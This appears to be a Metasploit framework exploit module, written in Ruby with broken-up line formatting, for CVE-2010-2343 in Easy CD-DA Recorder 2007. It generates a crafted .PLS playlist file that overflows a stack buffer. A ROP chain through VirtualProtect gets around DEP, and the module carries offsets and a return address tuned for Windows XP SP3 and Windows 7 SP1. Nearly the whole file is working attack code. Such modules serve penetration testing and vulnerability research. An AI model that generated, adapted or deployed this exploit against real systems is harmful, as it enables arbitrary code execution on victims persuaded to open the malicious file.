##
# This module requires Metasploit: http//metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##
require
'msf/core'
class
Metasploit3 < Msf::Exploit::Remote
Rank = NormalRanking
include Msf::Exploit::
FILEFORMAT
def
initialize(info = {})
super
(update_info(info,
'Name'
=>
'Easy CD-DA Recorder PLS Buffer Overflow'
,
'Description'
=> %q{
This
module
exploits a stack-based buffer overflow vulnerability
in
Easy
CD
-
DA
Recorder
2007
, caused by a long string
in
a playlist entry.
By persuading the victim to open a specially-crafted .
PLS
file, a
remote attacker could execute arbitrary code on the system
or
cause
the application to crash. This
module
has been tested successfully on
Windows
XP
SP3
and
Windows
7
SP1
.
},
'License'
=>
MSF_LICENSE
,
'Author'
=>
[
'chap0'
,
# Vulnerability discovery and original exploit
'Gabor Seljan'
,
# Metasploit module
'juan vazquez'
# Improved reliability
],
'References'
=>
[
[
'BID'
,
'40631'
],
[
'EDB'
,
'13761'
],
[
'OSVDB'
,
'65256'
],
[
'CVE'
,
'2010-2343'
],
[
'URL'
,
'http://www.corelan.be:8800/advisories.php?id=CORELAN-10-048'
]
],
'DefaultOptions'
=>
{
'ExitFunction'
=>
'process'
},
'Platform'
=>
'win'
,
'Payload'
=>
{
'DisableNops'
=>
true
,
'BadChars'
=>
"\x0a\x3d"
,
'Space'
=>
2454
,
'PrependEncoder'
=>
"\x81\xc4\x54\xf2\xff\xff"
# ADD ESP,-3500
},
'Targets'
=>
[
[
'Windows XP SP3 / Windows 7 SP1 (DEP Bypass)'
,
# easycdda.exe 3.0.114.0
# audconv.dll 7.0.815.0
{
'Offset'
=>
1108
,
'Ret'
=> 0x1001b19b
# ADD ESP,0C10 # RETN 0x04 [audconv.dll]
}
]
],
'Privileged'
=>
false
,
'DisclosureDate'
=>
'Jun 7 2010'
,
'DefaultTarget'
=>
0
))
register_options(
[
OptString.
new
(
'FILENAME'
, [
false
,
'The file name.'
,
'msf.pls'
])
],
self
.
class
)
end
def
nops
return
make_nops(
4
).unpack(
"V"
).first
end
def
rop_nops(n =
1
)
# RETN (ROP NOP) [audconv.dll]
[0x1003d55d].pack(
'V'
) * n
end
def
exploit
# ROP chain generated by mona.py - See corelan.be
rop_gadgets =
[
0x1007261e,
# POP EDX # RETN [audconv.dll]
0x0042a0e0,
# &VirtualProtect() [IAT easycdda.exe]
0x1003bd6b,
# MOV EAX,DWORD PTR DS:[EDX] # RETN [audconv.dll]
0x10035802,
# XCHG EAX,ESI # RETN [audconv.dll]
0x1005d288,
# POP EBP # RETN [audconv.dll]
0x004030c8,
# &PUSH ESP # RET 0x08 [easycdda.exe]
0x1005cc2d,
# POP EBX # RETN [audconv.dll]
0x00000996,
# 0x00000996-> EBX
0x1008740c,
# POP EDX # RETN [audconv.dll]
0x00000040,
# 0x00000040-> EDX
0x1001826d,
# POP ECX # RETN [audconv.dll]
0x004364c6,
# &Writable location [easycdda.exe]
0x00404aa9,
# POP EDI # RETN [easycdda.exe]
0x100378e6,
# RETN (ROP NOP) [audconv.dll]
0x0042527d,
# POP EAX # RETN [easycdda.exe]
nops,
0x00429692
# PUSHAD # INC EBX # ADD CL,CH # RETN [easycdda.exe]
].flatten.pack(
'V*'
)
sploit = rop_nops(target[
'Offset'
] /
4
)
sploit << [0x1003d55c].pack(
"V"
)
# pop edi # ret [audconv.dll]
sploit << [target.ret].pack(
"V"
)
sploit << rop_nops(
22
)
sploit << rop_gadgets
sploit << payload.encoded
sploit << rand_text_alpha_upper(
10000
)
# Generate exception
# Create the file
print_status(
"Creating '#{datastore['FILENAME']}' file ..."
)
file_create(sploit)
end
end